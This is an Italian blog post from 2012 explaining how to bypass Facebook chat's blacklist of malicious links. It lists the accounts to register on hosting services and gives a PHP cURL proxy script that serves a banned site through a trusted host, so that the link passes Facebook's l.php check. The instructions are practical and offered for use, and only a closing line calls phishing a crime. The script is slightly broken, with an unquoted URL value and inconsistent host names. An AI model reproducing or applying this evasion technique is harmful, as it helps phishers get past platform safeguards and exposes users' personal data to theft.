mercoledì 7 novembre 2012

Phishing nella chat di Facebook

Facebook ha preso provvedimenti per quanto riguarda la possibilità di linkare in chat i siti che sono segnalati malevoli, in sostanza ha creato una "blacklist" di siti e di domini, quindi è teoricamente impossibile trasmetterli(come link) attraverso la chat.Anche molte "url  brevi" (quegli indirizzi brevi che rimandano al sito originale) molto spesso non sono accettati in chat.Per cui sembrerebbe tutto risolto, in realtà vi sono alcuni metodi per aggirare la blacklist e mettere in pericolo i nostri dati personali.Quando incolliamo un link nella chat, in realtà chiamiamo una pagina PHP di Facebook:

http://www.facebook.com/l.php?u=http://www.sito.com&h=1AQFW4sMm

La pagina PHP riceve 2 parametri di cui il primo("u") identifica il sito che intendiamo linkare , questo script verifica che il sito non sia in blacklist, e successivamente avvisa che si sta per abbandonare Facebook ed aprire un sito esterno. Per evitare la censura di Facebook, dovremmo quindi creare una pagina su un host considerato "affidabile" e dal sito affidabile aprire il sito in blacklist. Ecco un esempio pratico, avete bisogno di 3 cose:

1)account su host non in blacklist(potete aprirlo qui www.altervista.org, dovete abilitare il server-to-server)
2)account su host in blacklist (potete aprirlo qui 000webhost.com, il server-to-server è abilitato di default)
3 il seguente script PHP (salvatelo con un nome a caso "nome.php")

<?php
$url=vostrosito.freeiz.com; //mettete il nome del vostro sito
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$str = curl_exec($ch);
echo $str;
curl_close($ch);
?>


Lo script deve essere copiato nella directory pubblica del sito "vostrosito.altervista.com", se ora aprite il seguente link:

http://www.facebook.com/l.php?u=http://vostrosito.altervista.com/nome.php&h=1AQFW4sMm

Sul browser comparirà la pagina ospitata da "vostrosito.freeiz.com"(dominio bannato da Facebook), in realtà la pagina vi è stata mandata dal server di altervista(se controllate sulla barra degli indirizzi ve ne renderete conto), ma cliccando su un qualsiasi link di questa pagina vi troverete a tutti gli effetti su vostrosito.freeiz.com.

PS. Vi ricordo che il Phishing è un crimine informatico! Quindi leggete questo ed altri articoli SOLO a titolo informativo.

Nessun commento:

Posta un commento